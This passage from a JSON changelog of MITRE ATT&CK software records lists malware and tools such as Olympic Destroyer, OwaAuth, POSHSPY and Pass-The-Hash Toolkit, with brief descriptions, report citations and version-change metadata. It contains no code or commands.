Code From Chinese Hacker Group. Retrieved November 30, 2018.", + "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "OceanSalt" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:52.708000+00:00\", \"old_value\": \"2025-04-16 20:37:59.147000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-06 21:12:31.535000+00:00", + "modified": "2025-04-25 14:43:14.113000+00:00", + "name": "Okrum", + "description": "[Okrum](https://attack.mitre.org/software/S0439) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang](https://attack.mitre.org/groups/G0004).(Citation: ESET Okrum July 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0439", + "external_id": "S0439" + }, + { + "source_name": "ESET Okrum July 2019", + "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Okrum" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:14.113000+00:00\", \"old_value\": \"2025-04-16 20:38:05.946000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3249e92a-870b-426d-8790-ba311c1abfb4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-03-25 14:07:22.547000+00:00", + "modified": "2025-04-25 14:42:59.783000+00:00", + "name": "Olympic Destroyer", + "description": "[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://attack.mitre.org/software/S0365) has worm-like features to spread itself across a computer network in order to maximize its destructive impact.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0365", + "external_id": "S0365" + }, + { + "source_name": "Talos Olympic Destroyer 2018", + "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", + "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Olympic Destroyer" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:59.783000+00:00\", \"old_value\": \"2025-04-16 20:38:01.435000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--b136d088-a829-432c-ac26-5529c26d4c7e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:37.341000+00:00", + "modified": "2025-04-25 14:44:25.559000+00:00", + "name": "OnionDuke", + "description": "[OnionDuke](https://attack.mitre.org/software/S0052) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2013 to 2015. (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0052", + "external_id": "S0052" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "OnionDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:25.559000+00:00\", \"old_value\": \"2025-04-16 20:38:30.711000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--8e101fdd-9f7f-4916-bb04-6bd9e94c129c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:01.012000+00:00", + "name": "OopsIE", + "description": "[OopsIE](https://attack.mitre.org/software/S0264) is a Trojan used by [OilRig](https://attack.mitre.org/groups/G0049) to remotely execute commands as well as upload/download files to/from victims. (Citation: Unit 42 OopsIE! Feb 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0264", + "external_id": "S0264" + }, + { + "source_name": "OopsIE", + "description": "(Citation: Unit 42 OopsIE! Feb 2018) (Citation: Unit 42 OilRig Sept 2018)" + }, + { + "source_name": "Unit 42 OopsIE! Feb 2018", + "description": "Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" + }, + { + "source_name": "Unit 42 OilRig Sept 2018", + "description": "Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "OopsIE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:01.012000+00:00\", \"old_value\": \"2025-04-16 20:38:21.971000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "tool", + "id": "tool--80c815bb-b24a-4b9c-9d73-ff4c075a278d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-19 13:11:50.666000+00:00", + "modified": "2025-04-25 14:45:22.072000+00:00", + "name": "Out1", + "description": "[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0594", + "external_id": "S0594" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Out1" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:22.072000+00:00\", \"old_value\": \"2025-04-16 20:38:53.377000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a60657fa-e2e7-4f8f-8128-a882534ae8c5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:47.412000+00:00", + "modified": "2025-04-25 14:44:19.163000+00:00", + "name": "OwaAuth", + "description": "[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Dell TG-3390)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0072", + "external_id": "S0072" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "OwaAuth" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:19.163000+00:00\", \"old_value\": \"2025-04-16 20:38:28.901000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--4800d0f9-00aa-47cd-a4d2-92198585b8fd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13 12:46:58.579000+00:00", + "modified": "2025-04-25 14:43:11.044000+00:00", + "name": "P.A.S. Webshell", + "description": "[P.A.S. Webshell](https://attack.mitre.org/software/S0598) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0598", + "external_id": "S0598" + }, + { + "source_name": "Fobushell", + "description": "(Citation: NCCIC AR-17-20045 February 2017)" + }, + { + "source_name": "ANSSI Sandworm January 2021", + "description": "ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021.", + "url": "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf" + }, + { + "source_name": "NCCIC AR-17-20045 February 2017", + "description": "NCCIC. (2017, February 10). Enhanced Analysis of GRIZZLY STEPPE Activity. Retrieved April 12, 2021.", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "P.A.S. Webshell", + "Fobushell" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:11.044000+00:00\", \"old_value\": \"2025-04-16 20:38:05.296000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--7c58fff0-d206-4db1-96b1-e3a9e0e320b9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-21 15:02:47.928000+00:00", + "modified": "2025-04-25 14:43:50.562000+00:00", + "name": "P8RAT", + "description": "[P8RAT](https://attack.mitre.org/software/S0626) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0626", + "external_id": "S0626" + }, + { + "source_name": "HEAVYPOT", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "GreetCake", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "Securelist APT10 March 2021", + "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.", + "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "P8RAT", + "HEAVYPOT", + "GreetCake" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:50.562000+00:00\", \"old_value\": \"2025-04-16 20:38:19.073000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f6ae7a52-f3b6-4525-9daf-640c083f006e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:45:05.924000+00:00", + "name": "PHOREAL", + "description": "[PHOREAL](https://attack.mitre.org/software/S0158) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0158", + "external_id": "S0158" + }, + { + "source_name": "PHOREAL", + "description": "(Citation: FireEye APT32 May 2017)" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PHOREAL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:05.924000+00:00\", \"old_value\": \"2025-04-16 20:38:43.708000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:49.775000+00:00", + "name": "PLAINTEE", + "description": "[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0254", + "external_id": "S0254" + }, + { + "source_name": "PLAINTEE", + "description": "(Citation: Rancor Unit42 June 2018)" + }, + { + "source_name": "Rancor Unit42 June 2018", + "description": "Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PLAINTEE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:49.775000+00:00\", \"old_value\": \"2025-04-16 20:37:58.191000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b57f419e-8b12-49d3-886b-145383725dcd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-06 12:55:10.969000+00:00", + "modified": "2025-04-25 19:04:32.446000+00:00", + "name": "PLEAD", + "description": "[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two. [PLEAD](https://attack.mitre.org/software/S0435) was observed in use as early as March 2017.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0435", + "external_id": "S0435" + }, + { + "source_name": "Trend Micro PLEAD RTLO", + "description": "Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/" + }, + { + "source_name": "TrendMicro BlackTech June 2017", + "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/" + }, + { + "source_name": "PLEAD", + "description": "PLEAD derived its name from letters used in backdoor commands in intrusion campaigns.(Citation: Trend Micro PLEAD RTLO)(Citation: TrendMicro BlackTech June 2017)" + }, + { + "source_name": "JPCert PLEAD Downloader June 2018", + "description": "Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.", + "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html" + }, + { + "source_name": "JPCert TSCookie March 2018", + "description": "Tomonaga, S. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020.", + "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "PLEAD" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tatsuya Daitoku, Cyber Defense Institute, Inc.", + "Hannah S" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 19:04:32.446000+00:00\", \"old_value\": \"2025-04-16 20:38:31.485000+00:00\"}, \"root['x_mitre_contributors'][1]\": {\"new_value\": \"Hannah S\", \"old_value\": \"Hannah Simes, BT Security\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--5e595477-2e78-4ce7-ae42-e0b059b17808", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:43:31.381000+00:00", + "name": "POSHSPY", + "description": "[POSHSPY](https://attack.mitre.org/software/S0150) is a backdoor that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0150", + "external_id": "S0150" + }, + { + "source_name": "POSHSPY", + "description": "(Citation: FireEye POSHSPY April 2017)" + }, + { + "source_name": "FireEye POSHSPY April 2017", + "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29\u2019s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "POSHSPY" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:31.381000+00:00\", \"old_value\": \"2025-04-16 20:38:11.901000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--e85cae1a-bce3-4ac4-b36b-b00acac0567b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-04-16 17:43:42.724000+00:00", + "modified": "2025-04-25 14:44:58.949000+00:00", + "name": "POWERTON", + "description": "[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0371", + "external_id": "S0371" + }, + { + "source_name": "FireEye APT33 Guardrail", + "description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "POWERTON" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:58.949000+00:00\", \"old_value\": \"2025-04-16 20:38:41.138000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:38.309000+00:00", + "name": "POWRUNER", + "description": "[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0184", + "external_id": "S0184" + }, + { + "source_name": "POWRUNER", + "description": "(Citation: FireEye APT34 Dec 2017)" + }, + { + "source_name": "FireEye APT34 Dec 2017", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "POWRUNER" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:38.309000+00:00\", \"old_value\": \"2025-04-16 20:37:54.652000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--a52edc76-328d-4596-85e7-d56ef5a9eb69", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:11.426000+00:00", + "modified": "2025-04-25 14:45:25.272000+00:00", + "name": "Pass-The-Hash Toolkit", + "description": "[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to \"pass\" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0122", + "external_id": "S0122" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:25.272000+00:00\", 